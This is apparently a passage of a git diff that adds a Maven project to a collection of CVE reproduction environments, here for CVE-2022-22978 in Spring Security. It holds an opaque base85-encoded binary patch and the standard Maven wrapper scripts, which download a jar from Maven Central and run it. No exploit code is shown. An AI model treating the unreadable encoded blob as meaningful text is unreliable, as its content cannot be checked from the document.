zH0_$NU^IA*vggPKcV#^ZnMv+Y14O`3_6&I=gvNS4SzCcf&xe8RyXn8fZ_2*%8?g?* z6Zw|}6J6&u$=>oc&F04YExJ?PQ0YrF;-po++AD{R}`r&{YK*+$y8=fBx ze|ck@H(vicS@v-{9`8M>U`RYh21M#1^28W%MFs3b& zo{*WD#d}v7c_es!7}Eln^6=!11`Y#=6k0S4R*g|4Ad|bx4*=5#qV`SpX2ZMAGKjqL zMh=>NB1ivmQghlr>6uWJG{kimD^ewc^o%^YUL z*dE}-w!i&!eZv~gTly1YKTTkXiFasGU}#lxbsJJ+d*ld-M<@dk->uMOKxDnsG|Wam z5$n}saFl_{Y@X|&@(@)(#FJ$4`bZ9u^A33r5p{MJJfQ+5CAoFV6c$Nx_3)#Oj`iN@ zTM2Dc4O)KkZ$W4k5UGbqbBJW0k~mI-*c+#)@)lL*fvBw4dWWpc0O)__kXZqG z4gHctP5A&sIai1d1svzu)Sg)qI9?;`-3aIy>=?XIu3<#>b1!?wzA2E+@-r9CE%Ar} z1M(muP=2_4_g^%B3z&H8J&h!=O+wXpj?_b>Aua_Ymq)ZHULxyK&-z0S(TtE;$3rv$ zL~WRk`%dp6pLWgmmE%2~j*a`M^vX;7^s`&qNv1WpVE2Fy8F<8CgS!GxECYzD`c)6J z92x_LtUJEt4q+@~rPqG^gAoMvK&S;GnHSH{mUP44UffOx_@?Inqzi)ZmIBecT_7Sq 
zi0$AZk|z&wXX^#fo`k2Kc`985O1^U7Ieg?zT=N1?+SAOuKo%MUaJ)CjcbPY1J0wi| zx7%Y1PkBCrkS%M0h_D&G$ViwbMog%Six+pOB)cW!j{|(XoG2d;(noXNze0C-LRqO1 z6R(kPz!ZppB|wO-^W+dQ&vEm|WIL=wh>i=~E<{2r|C;Kv9-a^V&YV>JO*};JNR~fg zB&$!i{P%&D*3;9#O%I3w9RKEe4@Lf^uks2E4@A_-KvW<_J!@O(h725imj2+FOdsfz z1i3R7*1{7;{t!T9=dQg@u>XDQ?Io|vs60d#GF$LF?Wc34>yoGqm;guIWX|Wj5T1|? zwD=ypSe(xn)AtiD^RMynULu2^>Ro5qIy_B^$-aV9nc`_6FVLuZqAxRL}N!z5sjsS6=49)A?kUC`o{l-@9P24{d$Nb zhaumTC5Pv8@`H4Ly@v?T5s)I?xdDu{9v+RK|BHeNIY!jSOTs))t_!>;2^OY8Y|^M7 zX)c6>>~b$N&Ykr%!wb}!<|px)Jw)PVDgd-A4}ydp_}mvb5Wum|0fEGAzvJm!Wng{`Hf&hy2yjF-A z0Z|5*VcG$aj&z@Ziu<3yQSmgjIZZ7P*&vdfBmR5j=<&Pp$^V99d*>JLDI28Y#^VL- z7!dK>@L<8YF%OYlQyOwpD59SIxAE-Cc@{6}oN=bO7!n|o-dhEV43^}==m3#~ z$vQAp0Z~q}28cAVdV9$6;pK)TPS-%Ro9gTe5aB&CAoBJX`RNF^w7OuQkteOaL%b#A z9?@;~>2%@Tl@r2Ac4RA^yr+l_TQd< zDmAclO=tU>fc>$&gl}j0?R0Lj4|&^hUIt*%O&`c1#P(9U@N9rT$zOW+Em=nQc7-eb zBYy}i3=qU;ABeoMo&nKuCQy_g9Pm+iA`1WP`+X?6}z<{1#21JCl_+&o+NUIK1#otd5~Hoj|muJ`vB3W z2Xm<_A+uFLlx+k=KO$tNFl1)SOW2H01)nJ((y^tA$EcS>B=1Yga7;JYw}1Yg^AP26 za*k-UQp24+M1;xi9w-F1=VHp}KJ3G0Js@hI@KBN;dphTVY4fPju+bRW@c~TM@ByT3YsSz9sU2V_ zgdPw92%~UWzBa}{R2$zbp;&29i+8Ba4>C^?Mt#oH4nmhet`yvz%8vNePGqczCT0->DuVJ4a0K%D!r{HRpiy#J<@v15^e?3~iyk z%M?(|1b*h$qs)PjD`WlQAu2rL`lMNW`LmiMd$B7-6z2k!_# zLQW1jLU`5W_@pwc)HgxfR05}Ly+YQ>3sWCUK*}9 zhK9~Jd@TsIKx6~_*}8QOkLDOyBWz(B*5iI8IW1`&ycaaqJfLBCv3X)Y6wi%%nIyM? 
z-dgwappO|`fEeIM0Z6?;gNH~U^Put$u}$)b$frE|w_GMUOZNn@Y#bs>o<2TgcK<-c z?`gfvtd4c-XPWcHF)+>VF4scZU#2D3CpU7MEIrF%MD3Y|M+Zpa9?d!Cn!#JZHt-q| zGGqI8PWi0}H?eK=LKPr-A_I}Wbk}=-#z0iVk@a5Gq-t{K#@F6)K;-LMVzBSw30ivN>eFH=WI=<{{ zfAF>CxBl!;(oN*=2YdY|YOnq12etiJKfm>-|3yan)R39N((b{IfROIYzQB)lgYP|M zL3I2v=t0I!3^<~U`qHJ|tX7hEf;BMoX6~L(8K3_|4$;tyOuN@p~$ zeLo%*OZYZ;#bX3``LJ30vRB~7racsK{{HAspG?=)8|nHg2J}#7M%fK1dp%vRPs;Tt z5R@T@^9BG}k~inc#vziNszb&h($TABwCY10!-gk+8f=b7ZqT`*v}@PAM|+2d(iqV= zSz29O3R=Vu)0;CZE?YJq4k-=CgLjr1F0 zuQ_{t!l*CzryO=rZ_-R|!aQ_|*ZFg8&;b%3qNfY~f-sIWym}L-zAXEldVHu)VyK>v zC!~&UPaA8^A7a~wQdbg-?`cmk$srQ2wz@e} znZ5Coe-!g&-oBOUGs3k2lZ|m?Km>@$z8oo-a2z($w+-tco~(4vEfgl8!}&P^GV8Ic z&eKEhXq;3n*Upgw2Hzo`yHtl^0+`l(9DQeT_KUUL+diLqcY`@%6vg*Lh&j&ID5b5RXvZ4hjtA2L*u1{zn-1e3sFc z@sPWdpu$3M7~AIf{q{IsdX)Y2mbL}bp{MPAWmj8W)NK+dE}_LK5DKMGiWEtK5;RB! zD^{dX+$j%M61)^hTijg=MT%P}uEn*uyAz!71ig7W?)?Y%(>vbtn+l%@ET=}|uLfxUTCJf5#l-RJX5*cY_BUCNzBEG|dkd>A=>%@9J;Oh65DAoc}AR*;u0yDrwGcpM>F#(?yz*xo`(bi&24RNcg46w=J$(a3{+5hD8w{`4dw zRB*|uQ*m@gU1q0HuK+;9mc%eP-ld#RUP_Ko6y6yAJ_k9x03iHs`b9u;o*^W~G;E?I zIakkYul-&=qd@*x4&oKGS@+IY1|1%KDCyd=#4ct`$ibOF{*HH}S7R`smu{0at(+#W zFWc?q{RKXNWSJsK3aa13<fmc=z9E~{aI4y$~htLqe8rOs-GuNPj(&ksDBjk4S3&jo^w7SjkD6{sL2!Z zXHG=yg!aszqy-VV+k5_+1*x!caA+>^VsMUwbi&Jy>8smekGC{+&%0i>H#fvwTAP+L zq{~jyohyo#2KQ>*y~ZkuDP53U0m&h@#~@qt4XX`cn|G z!o@|v`&0+QeWsP|&&}L|^7@`oT@tY5~{!u}c8fAIQ zK8=#cPQkXNvmxh zO^QhIk(_@=zR5w3Hv7@ zXwhbsc2$L6d?BN2KZ=B{Xl5M&Uk_@Ar_!51Ijpgo3##bSzxPEz_ja1<>2WHy!P5|Rt+dGaFpFwqmG;@$Z?7A6NZ6EjvQ z=e)&#agM7bC;w3cG*qdwTsiXj9AJ&QWJmA{S}V1Q;RXXSLhDG8yr?o3DCPX&1r@1g zB0}iTn#xmBzXaq%eKdMmF(c$6cFJHEpWG>bmR1VD^?5y`-h;pCNj(lvr-X@oEhQ8D z!XJgX43s~(`eD935A|UU&6MvL_876=fQ>_!X6!)hWf}QvreNythsq%+R6Iv^He_adNc$ z-CLM3dz#qw&QEIWi!!KI%gV{5m#y#6&Ky1DL5PaWmt$epFy^gHik7VK_?Xd?LMHUX zU6hW5^zWEakE8^bBt4R3QKf_hJ_J+@T(Fr>^xcf?-o_E{Y|j4WnkcDM!SwlQKScFB zq|TrI#pG%o7K3Zo zP!ssmj1G`Q3BhZ1KEW%5ImH9FB1OMZz-!qKq}zjW1Oubx44qB`WB0hIM~`1nm%j^O z!*k(j`nC8X;$&&?`260iW%W2j6zXmSev^GN`oXHx=_#f5-y65 
z9(W>?*tbs2y_9D`a4&>~wZk7R3r+*;ds|Uu1_2NHV4%;B?U7kP1-rG2{7Gv*KP1l| z7ay=~J)XLPUcbhX6+3F|bpAlE0GR_L+9Evu@aPhZ*T1MN{OZN)RK9BAX(Rv3@dfc~?jXu%r_a7&SssVadoR^AG zE0DpF{Ad2%fvV)vn5&<4Z@r4u10$I){edvw8Nu@tIxtX<>FX)0&Bx#N+36{uMmsnFJY2=hko+%)bkViqYl`LQ2aBLV`7 zUV{jOO%0h)9j=62UzSo%)V4(cHS95HcdylBhmRkB<7-$m9hw(JhBXBf zPHFqPwq%a}O~sp1qWb++Y=OS6XNilqr?z+<~Q(AVt5atr=h1f7+Ca6?v? zJy=2{#aF^lhh&-p>Q$@3@8iyxatr*m)okOK8rLT~N> z8*kNr8vm`p8Z@wvI!4}#7;mtXb*5*`P<-kxeVPJ#fVkC1w-(~v(vhx~LzJ>Pg8t)& ziD7i2{?YzXAazQ(X~d~g^-*;;o8JflFS*fQ*t%$5Sw?BRF=cti3sQ>5#8Y=DhsJ9UOasn`*htu#$1 z9~4cE0y@2VqVampbl*QDaL^JuAB#8`S&~RLoN_SCvME6*(nCc~I4bEsOK~AkG={N4 z2KDRNRNd&gzj*a z-a_XOfe(P}!QzRA`JooS^@+Y8bIpAkiVb6-p7f-|NfW_Fg}7whYz{?&IRbuMqMyd* z<19tT9ua=0cXr8FZF7uPj%|01nP}_MqyDO9)-K_?8R7a~Fk+mc+v5qIurCivUm@K| zfW3sYO(_{#K|@=7GbM!V);dHzR8-zNJ_J{5xV;zrG#|&%j?E;AG2$dvtnN~V!GDWb z$ZEg0J(PUN*hc%+rQ2cI6?I`HyVhr6EN_e(U9wz2-!8CNgws^FYOO8j3lp>v!q=!U zUmo&EnyKv86A)socR^7n6r=!tmBG&JjzlHNk|<a%TG*RLLT!KOrtR`m2D5yPmp zxhrR9e02-TJ1KZTRNIP;v*-EUcJmx#&XfC;FUDA%x7V4X^ek!>eXs2dbteKI1!hsZ zsyL9uXr`<7Qhc5hW``ESDAD;ShBO%3I^3=!=5L|@Gv4m%Scb)y9r zfq~8~va3k^q4ouC<>)a$?53%lci2Wy zq~|U0ww#A##60e(x+CiL2(o$66CJ}sCXgmG>k(}p2gT3@Q*^I`5qGsddXIngJ~JZ} zTD0n0IPr>0LRp#3-#|++ocMv?JkGwnk;<@TyIrk(+&wo7F9AIbmL&K}fwyDxPj6?& z->R;)wIW`Y#4L9~I&6Cl+h5I2HBKx(xwJnlQ z_1@!30s#d4Wz<5oRjds{p_*4GnKE(>V$;n#BiPu<_0-E)wrlCPOSoMoFIx^-e2x>P zOf+ZgWb3Ir>ohr>$3dx702yCfL7@^YKHm~O^w18bNM}P)E9n_mRMhhF4kMG&0t2H4 z9|yicaiYBZ+Q`qOQDWR)oCxw}ShMng=LDqVEmO9%YpEV#0tImrVF6xwup_ z3TaEh?|3v!c85>LPcCHl_+(Oi7*0=qD0k_sNB#^X-twlhsQU32WO}iS*% zrbxNro9LWfdSvc#kO3pJ+=yB8lm-={?WgMXyS#@&P;Ip}so_b6xAN7%C{cm&o3veq;uqFjnoH zw8k0MYTfHwZ`13NUj+KzPZ&4~$GZ0unDgzTg~S+TbA)mr1g8|H6%^^C(LxcL`L?$dv#5Hfc&Z&p+A$*OeLS zU1FI1k2guaT7?qF!W82(Q(@95!jBO1I%07MGNUYc>TGxc|A{6%z{o)=y?%jVsg}>m-@;vAw*jstp~Un# zHLnZV`a&h*`T-$#WK5$Blhxxgj-2>BLzU!;Xqi|vFI#4`j0I7DEZ%K^)PpgClsbwy zgN@|OKc6hFRv7a%_&o2F`$V=%Y_fr*(UgJl=YZJ#|04e_=ywi{s|J^cMg)8wM1$`X z3(2AZ>%;VP&$;Xawlo54Z1AojMQpQUb@Tg&=bmST?@mv|<<8x_Aqdv5iCAt!OFARb 
z7c*L>b%LV?vMec|`kb4TtTx}M9{+sOyyH6P$jVmizh#40EOHl>#o9qCcFT$37-7G8 z-Px=X5o-DDbgK%f^D+mRLRFU23`8Yht0c6*e3-K=W@lSvc)G)|!#cgIU7o7cKU5y& z`GqJV%E!ul)(Z55Dfqs4bxY+;f1vi=yl(_t1W^P@^r&uFNkI1>D=EA`TsV^?c4}jQ zyl-HaWl+GXzN+DL=lA-LU50pun0IyMR}{apTbxd1wkFc9xIWvPUJIYzAtP7p&c^Yc`-g;t%{NKYI8ncw z3p!j;uW@6;oXVNt*LN>Q$EIJOXY|!N%s`!-1O(@Xw_g=VdmLHaIP{f>_&l6lU*Ax@ zF4{GYIvz+VMZK%@Ev^_~DRj(F!1RWV_P z_T8BVH51RXXd^>2T%FdaBSWQ&SczdJGHC*@yYg+js@SBrys|(Q=Ed)mi#_$lgo;e7 zRqnaj@u{1v-pl4!b$o=etVl3kk3r06#p^eIvo#LePWZF=O>Y#&QC+@Z^U4vn^D?c_ zfv@;u98`bSvcRj@xW;-0TBvUr_M%>Jb`-lv0d2`K3g4c4Uv-{WYW2!-pXo{UVxHC| zsxcLFsiGHZ zECYL1a(G_DtR)#LUfTx%`HLkF?FE?)p3O7>!WAjOxU!VI!pHYF8=jY>?%b)8OrB9P zSdG0Mq~Cj7TUUD{nBmjVzqz^>H=bhK_HCRYyxIIjJISwMb>_IQ{OIP{a!>D7t<6r@ zGwn4$lj&0H!t4E#y5nCXFU~6^HWnnP{tMm~&GrZ=N-UCcjY5pLyDV6&y=Om+5E&*o(88l;K4 z$(mQEy!e8zz;bJ=IQF?G4%sHk%(X$iVjgI z$ugG};k?IlWBXp#^Hldet22l1#5Sym(~jd<)xPh4aPLQRM_h7UZb!H(Hoe8iKS(}8 z!vqHDl@!>Xs%c{)SkWEz?2RO|;sH z8WmhY$01T!v(f;ej_cCq-?`CE^O4#9C*!>gOsIO8;V()FS*7>Enji9GHub9WvK^<+ zYfMvgSR`^=*?X^!)ZL*Dh%H);1U^b>cnx3N*ynogZdX+z>f*RSN@S{j3!N z*7G%AkDZb$jKY5?AW@PW;Gia#9e=fQI=0MJZQw|tQ^&R@#`-VV)S5teb3||C$k{1s z(m|(b>?tx)_LS#b \(.*\)$'` + if expr "$link" : '/.*' > /dev/null; then + PRG="$link" + else + PRG="`dirname "$PRG"`/$link" + fi + done + + saveddir=`pwd` + + M2_HOME=`dirname "$PRG"`/.. 
+ + # make it fully qualified + M2_HOME=`cd "$M2_HOME" && pwd` + + cd "$saveddir" + # echo Using m2 at $M2_HOME +fi + +# For Cygwin, ensure paths are in UNIX format before anything is touched +if $cygwin ; then + [ -n "$M2_HOME" ] && + M2_HOME=`cygpath --unix "$M2_HOME"` + [ -n "$JAVA_HOME" ] && + JAVA_HOME=`cygpath --unix "$JAVA_HOME"` + [ -n "$CLASSPATH" ] && + CLASSPATH=`cygpath --path --unix "$CLASSPATH"` +fi + +# For Mingw, ensure paths are in UNIX format before anything is touched +if $mingw ; then + [ -n "$M2_HOME" ] && + M2_HOME="`(cd "$M2_HOME"; pwd)`" + [ -n "$JAVA_HOME" ] && + JAVA_HOME="`(cd "$JAVA_HOME"; pwd)`" +fi + +if [ -z "$JAVA_HOME" ]; then + javaExecutable="`which javac`" + if [ -n "$javaExecutable" ] && ! [ "`expr \"$javaExecutable\" : '\([^ ]*\)'`" = "no" ]; then + # readlink(1) is not available as standard on Solaris 10. + readLink=`which readlink` + if [ ! `expr "$readLink" : '\([^ ]*\)'` = "no" ]; then + if $darwin ; then + javaHome="`dirname \"$javaExecutable\"`" + javaExecutable="`cd \"$javaHome\" && pwd -P`/javac" + else + javaExecutable="`readlink -f \"$javaExecutable\"`" + fi + javaHome="`dirname \"$javaExecutable\"`" + javaHome=`expr "$javaHome" : '\(.*\)/bin'` + JAVA_HOME="$javaHome" + export JAVA_HOME + fi + fi +fi + +if [ -z "$JAVACMD" ] ; then + if [ -n "$JAVA_HOME" ] ; then + if [ -x "$JAVA_HOME/jre/sh/java" ] ; then + # IBM's JDK on AIX uses strange locations for the executables + JAVACMD="$JAVA_HOME/jre/sh/java" + else + JAVACMD="$JAVA_HOME/bin/java" + fi + else + JAVACMD="`\\unset -f command; \\command -v java`" + fi +fi + +if [ ! -x "$JAVACMD" ] ; then + echo "Error: JAVA_HOME is not defined correctly." >&2 + echo " We cannot execute $JAVACMD" >&2 + exit 1 +fi + +if [ -z "$JAVA_HOME" ] ; then + echo "Warning: JAVA_HOME environment variable is not set." 
+fi + +CLASSWORLDS_LAUNCHER=org.codehaus.plexus.classworlds.launcher.Launcher + +# traverses directory structure from process work directory to filesystem root +# first directory with .mvn subdirectory is considered project base directory +find_maven_basedir() { + + if [ -z "$1" ] + then + echo "Path not specified to find_maven_basedir" + return 1 + fi + + basedir="$1" + wdir="$1" + while [ "$wdir" != '/' ] ; do + if [ -d "$wdir"/.mvn ] ; then + basedir=$wdir + break + fi + # workaround for JBEAP-8937 (on Solaris 10/Sparc) + if [ -d "${wdir}" ]; then + wdir=`cd "$wdir/.."; pwd` + fi + # end of workaround + done + echo "${basedir}" +} + +# concatenates all lines of a file +concat_lines() { + if [ -f "$1" ]; then + echo "$(tr -s '\n' ' ' < "$1")" + fi +} + +BASE_DIR=`find_maven_basedir "$(pwd)"` +if [ -z "$BASE_DIR" ]; then + exit 1; +fi + +########################################################################################## +# Extension to allow automatically downloading the maven-wrapper.jar from Maven-central +# This allows using the maven wrapper in projects that prohibit checking in binary data. +########################################################################################## +if [ -r "$BASE_DIR/.mvn/wrapper/maven-wrapper.jar" ]; then + if [ "$MVNW_VERBOSE" = true ]; then + echo "Found .mvn/wrapper/maven-wrapper.jar" + fi +else + if [ "$MVNW_VERBOSE" = true ]; then + echo "Couldn't find .mvn/wrapper/maven-wrapper.jar, downloading it ..." 
+ fi + if [ -n "$MVNW_REPOURL" ]; then + jarUrl="$MVNW_REPOURL/org/apache/maven/wrapper/maven-wrapper/3.1.0/maven-wrapper-3.1.0.jar" + else + jarUrl="https://repo.maven.apache.org/maven2/org/apache/maven/wrapper/maven-wrapper/3.1.0/maven-wrapper-3.1.0.jar" + fi + while IFS="=" read key value; do + case "$key" in (wrapperUrl) jarUrl="$value"; break ;; + esac + done < "$BASE_DIR/.mvn/wrapper/maven-wrapper.properties" + if [ "$MVNW_VERBOSE" = true ]; then + echo "Downloading from: $jarUrl" + fi + wrapperJarPath="$BASE_DIR/.mvn/wrapper/maven-wrapper.jar" + if $cygwin; then + wrapperJarPath=`cygpath --path --windows "$wrapperJarPath"` + fi + + if command -v wget > /dev/null; then + if [ "$MVNW_VERBOSE" = true ]; then + echo "Found wget ... using wget" + fi + if [ -z "$MVNW_USERNAME" ] || [ -z "$MVNW_PASSWORD" ]; then + wget "$jarUrl" -O "$wrapperJarPath" || rm -f "$wrapperJarPath" + else + wget --http-user=$MVNW_USERNAME --http-password=$MVNW_PASSWORD "$jarUrl" -O "$wrapperJarPath" || rm -f "$wrapperJarPath" + fi + elif command -v curl > /dev/null; then + if [ "$MVNW_VERBOSE" = true ]; then + echo "Found curl ... using curl" + fi + if [ -z "$MVNW_USERNAME" ] || [ -z "$MVNW_PASSWORD" ]; then + curl -o "$wrapperJarPath" "$jarUrl" -f + else + curl --user $MVNW_USERNAME:$MVNW_PASSWORD -o "$wrapperJarPath" "$jarUrl" -f + fi + + else + if [ "$MVNW_VERBOSE" = true ]; then + echo "Falling back to using Java to download" + fi + javaClass="$BASE_DIR/.mvn/wrapper/MavenWrapperDownloader.java" + # For Cygwin, switch paths to Windows format before running javac + if $cygwin; then + javaClass=`cygpath --path --windows "$javaClass"` + fi + if [ -e "$javaClass" ]; then + if [ ! -e "$BASE_DIR/.mvn/wrapper/MavenWrapperDownloader.class" ]; then + if [ "$MVNW_VERBOSE" = true ]; then + echo " - Compiling MavenWrapperDownloader.java ..." 
+ fi + # Compiling the Java class + ("$JAVA_HOME/bin/javac" "$javaClass") + fi + if [ -e "$BASE_DIR/.mvn/wrapper/MavenWrapperDownloader.class" ]; then + # Running the downloader + if [ "$MVNW_VERBOSE" = true ]; then + echo " - Running MavenWrapperDownloader.java ..." + fi + ("$JAVA_HOME/bin/java" -cp .mvn/wrapper MavenWrapperDownloader "$MAVEN_PROJECTBASEDIR") + fi + fi + fi +fi +########################################################################################## +# End of extension +########################################################################################## + +export MAVEN_PROJECTBASEDIR=${MAVEN_BASEDIR:-"$BASE_DIR"} +if [ "$MVNW_VERBOSE" = true ]; then + echo $MAVEN_PROJECTBASEDIR +fi +MAVEN_OPTS="$(concat_lines "$MAVEN_PROJECTBASEDIR/.mvn/jvm.config") $MAVEN_OPTS" + +# For Cygwin, switch paths to Windows format before running java +if $cygwin; then + [ -n "$M2_HOME" ] && + M2_HOME=`cygpath --path --windows "$M2_HOME"` + [ -n "$JAVA_HOME" ] && + JAVA_HOME=`cygpath --path --windows "$JAVA_HOME"` + [ -n "$CLASSPATH" ] && + CLASSPATH=`cygpath --path --windows "$CLASSPATH"` + [ -n "$MAVEN_PROJECTBASEDIR" ] && + MAVEN_PROJECTBASEDIR=`cygpath --path --windows "$MAVEN_PROJECTBASEDIR"` +fi + +# Provide a "standardized" way to retrieve the CLI args that will +# work with both Windows and non-Windows executions. +MAVEN_CMD_LINE_ARGS="$MAVEN_CONFIG $@" +export MAVEN_CMD_LINE_ARGS + +WRAPPER_LAUNCHER=org.apache.maven.wrapper.MavenWrapperMain + +exec "$JAVACMD" \ + $MAVEN_OPTS \ + $MAVEN_DEBUG_OPTS \ + -classpath "$MAVEN_PROJECTBASEDIR/.mvn/wrapper/maven-wrapper.jar" \ + "-Dmaven.home=${M2_HOME}" \ + "-Dmaven.multiModuleProjectDirectory=${MAVEN_PROJECTBASEDIR}" \ + ${WRAPPER_LAUNCHER} $MAVEN_CONFIG "$@" diff --git a/cve/java-spring-security/2022/CVE-2022-22978/mvnw.cmd b/cve/java-spring-security/2022/CVE-2022-22978/mvnw.cmd new file mode 100644 index 00000000..1d8ab018 --- /dev/null +++ b/cve/java-spring-security/2022/CVE-2022-22978/mvnw.cmd 
@@ -0,0 +1,188 @@ +@REM ---------------------------------------------------------------------------- +@REM Licensed to the Apache Software Foundation (ASF) under one +@REM or more contributor license agreements. See the NOTICE file +@REM distributed with this work for additional information +@REM regarding copyright ownership. The ASF licenses this file +@REM to you under the Apache License, Version 2.0 (the +@REM "License"); you may not use this file except in compliance +@REM with the License. You may obtain a copy of the License at +@REM +@REM https://www.apache.org/licenses/LICENSE-2.0 +@REM +@REM Unless required by applicable law or agreed to in writing, +@REM software distributed under the License is distributed on an +@REM "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +@REM KIND, either express or implied. See the License for the +@REM specific language governing permissions and limitations +@REM under the License. +@REM ---------------------------------------------------------------------------- + +@REM ---------------------------------------------------------------------------- +@REM Maven Start Up Batch script +@REM +@REM Required ENV vars: +@REM JAVA_HOME - location of a JDK home dir +@REM +@REM Optional ENV vars +@REM M2_HOME - location of maven2's installed home dir +@REM MAVEN_BATCH_ECHO - set to 'on' to enable the echoing of the batch commands +@REM MAVEN_BATCH_PAUSE - set to 'on' to wait for a keystroke before ending +@REM MAVEN_OPTS - parameters passed to the Java VM when running Maven +@REM e.g. 
to debug Maven itself, use +@REM set MAVEN_OPTS=-Xdebug -Xrunjdwp:transport=dt_socket,server=y,suspend=y,address=8000 +@REM MAVEN_SKIP_RC - flag to disable loading of mavenrc files +@REM ---------------------------------------------------------------------------- + +@REM Begin all REM lines with '@' in case MAVEN_BATCH_ECHO is 'on' +@echo off +@REM set title of command window +title %0 +@REM enable echoing by setting MAVEN_BATCH_ECHO to 'on' +@if "%MAVEN_BATCH_ECHO%" == "on" echo %MAVEN_BATCH_ECHO% + +@REM set %HOME% to equivalent of $HOME +if "%HOME%" == "" (set "HOME=%HOMEDRIVE%%HOMEPATH%") + +@REM Execute a user defined script before this one +if not "%MAVEN_SKIP_RC%" == "" goto skipRcPre +@REM check for pre script, once with legacy .bat ending and once with .cmd ending +if exist "%USERPROFILE%\mavenrc_pre.bat" call "%USERPROFILE%\mavenrc_pre.bat" %* +if exist "%USERPROFILE%\mavenrc_pre.cmd" call "%USERPROFILE%\mavenrc_pre.cmd" %* +:skipRcPre + +@setlocal + +set ERROR_CODE=0 + +@REM To isolate internal variables from possible post scripts, we use another setlocal +@setlocal + +@REM ==== START VALIDATION ==== +if not "%JAVA_HOME%" == "" goto OkJHome + +echo. +echo Error: JAVA_HOME not found in your environment. >&2 +echo Please set the JAVA_HOME variable in your environment to match the >&2 +echo location of your Java installation. >&2 +echo. +goto error + +:OkJHome +if exist "%JAVA_HOME%\bin\java.exe" goto init + +echo. +echo Error: JAVA_HOME is set to an invalid directory. >&2 +echo JAVA_HOME = "%JAVA_HOME%" >&2 +echo Please set the JAVA_HOME variable in your environment to match the >&2 +echo location of your Java installation. >&2 +echo. +goto error + +@REM ==== END VALIDATION ==== + +:init + +@REM Find the project base dir, i.e. the directory that contains the folder ".mvn". +@REM Fallback to current working directory if not found. 
+ +set MAVEN_PROJECTBASEDIR=%MAVEN_BASEDIR% +IF NOT "%MAVEN_PROJECTBASEDIR%"=="" goto endDetectBaseDir + +set EXEC_DIR=%CD% +set WDIR=%EXEC_DIR% +:findBaseDir +IF EXIST "%WDIR%"\.mvn goto baseDirFound +cd .. +IF "%WDIR%"=="%CD%" goto baseDirNotFound +set WDIR=%CD% +goto findBaseDir + +:baseDirFound +set MAVEN_PROJECTBASEDIR=%WDIR% +cd "%EXEC_DIR%" +goto endDetectBaseDir + +:baseDirNotFound +set MAVEN_PROJECTBASEDIR=%EXEC_DIR% +cd "%EXEC_DIR%" + +:endDetectBaseDir + +IF NOT EXIST "%MAVEN_PROJECTBASEDIR%\.mvn\jvm.config" goto endReadAdditionalConfig + +@setlocal EnableExtensions EnableDelayedExpansion +for /F "usebackq delims=" %%a in ("%MAVEN_PROJECTBASEDIR%\.mvn\jvm.config") do set JVM_CONFIG_MAVEN_PROPS=!JVM_CONFIG_MAVEN_PROPS! %%a +@endlocal & set JVM_CONFIG_MAVEN_PROPS=%JVM_CONFIG_MAVEN_PROPS% + +:endReadAdditionalConfig + +SET MAVEN_JAVA_EXE="%JAVA_HOME%\bin\java.exe" +set WRAPPER_JAR="%MAVEN_PROJECTBASEDIR%\.mvn\wrapper\maven-wrapper.jar" +set WRAPPER_LAUNCHER=org.apache.maven.wrapper.MavenWrapperMain + +set DOWNLOAD_URL="https://repo.maven.apache.org/maven2/org/apache/maven/wrapper/maven-wrapper/3.1.0/maven-wrapper-3.1.0.jar" + +FOR /F "usebackq tokens=1,2 delims==" %%A IN ("%MAVEN_PROJECTBASEDIR%\.mvn\wrapper\maven-wrapper.properties") DO ( + IF "%%A"=="wrapperUrl" SET DOWNLOAD_URL=%%B +) + +@REM Extension to allow automatically downloading the maven-wrapper.jar from Maven-central +@REM This allows using the maven wrapper in projects that prohibit checking in binary data. +if exist %WRAPPER_JAR% ( + if "%MVNW_VERBOSE%" == "true" ( + echo Found %WRAPPER_JAR% + ) +) else ( + if not "%MVNW_REPOURL%" == "" ( + SET DOWNLOAD_URL="%MVNW_REPOURL%/org/apache/maven/wrapper/maven-wrapper/3.1.0/maven-wrapper-3.1.0.jar" + ) + if "%MVNW_VERBOSE%" == "true" ( + echo Couldn't find %WRAPPER_JAR%, downloading it ... 
+ echo Downloading from: %DOWNLOAD_URL% + ) + + powershell -Command "&{"^ + "$webclient = new-object System.Net.WebClient;"^ + "if (-not ([string]::IsNullOrEmpty('%MVNW_USERNAME%') -and [string]::IsNullOrEmpty('%MVNW_PASSWORD%'))) {"^ + "$webclient.Credentials = new-object System.Net.NetworkCredential('%MVNW_USERNAME%', '%MVNW_PASSWORD%');"^ + "}"^ + "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $webclient.DownloadFile('%DOWNLOAD_URL%', '%WRAPPER_JAR%')"^ + "}" + if "%MVNW_VERBOSE%" == "true" ( + echo Finished downloading %WRAPPER_JAR% + ) +) +@REM End of extension + +@REM Provide a "standardized" way to retrieve the CLI args that will +@REM work with both Windows and non-Windows executions. +set MAVEN_CMD_LINE_ARGS=%* + +%MAVEN_JAVA_EXE% ^ + %JVM_CONFIG_MAVEN_PROPS% ^ + %MAVEN_OPTS% ^ + %MAVEN_DEBUG_OPTS% ^ + -classpath %WRAPPER_JAR% ^ + "-Dmaven.multiModuleProjectDirectory=%MAVEN_PROJECTBASEDIR%" ^ + %WRAPPER_LAUNCHER% %MAVEN_CONFIG% %* +if ERRORLEVEL 1 goto error +goto end + +:error +set ERROR_CODE=1 + +:end +@endlocal & set ERROR_CODE=%ERROR_CODE% + +if not "%MAVEN_SKIP_RC%"=="" goto skipRcPost +@REM check for post script, once with legacy .bat ending and once with .cmd ending +if exist "%USERPROFILE%\mavenrc_post.bat" call "%USERPROFILE%\mavenrc_post.bat" +if exist "%USERPROFILE%\mavenrc_post.cmd" call "%USERPROFILE%\mavenrc_post.cmd" +:skipRcPost + +@REM pause the script if MAVEN_BATCH_PAUSE is set to 'on' +if "%MAVEN_BATCH_PAUSE%"=="on" pause + +if "%MAVEN_TERMINATE_CMD%"=="on" exit %ERROR_CODE% + +cmd /C exit /B %ERROR_CODE% diff --git a/cve/java-spring-security/2022/CVE-2022-22978/pom.xml b/cve/java-spring-security/2022/CVE-2022-22978/pom.xml new file mode 100644 index 00000000..861fa8cf --- /dev/null +++ b/cve/java-spring-security/2022/CVE-2022-22978/pom.xml 
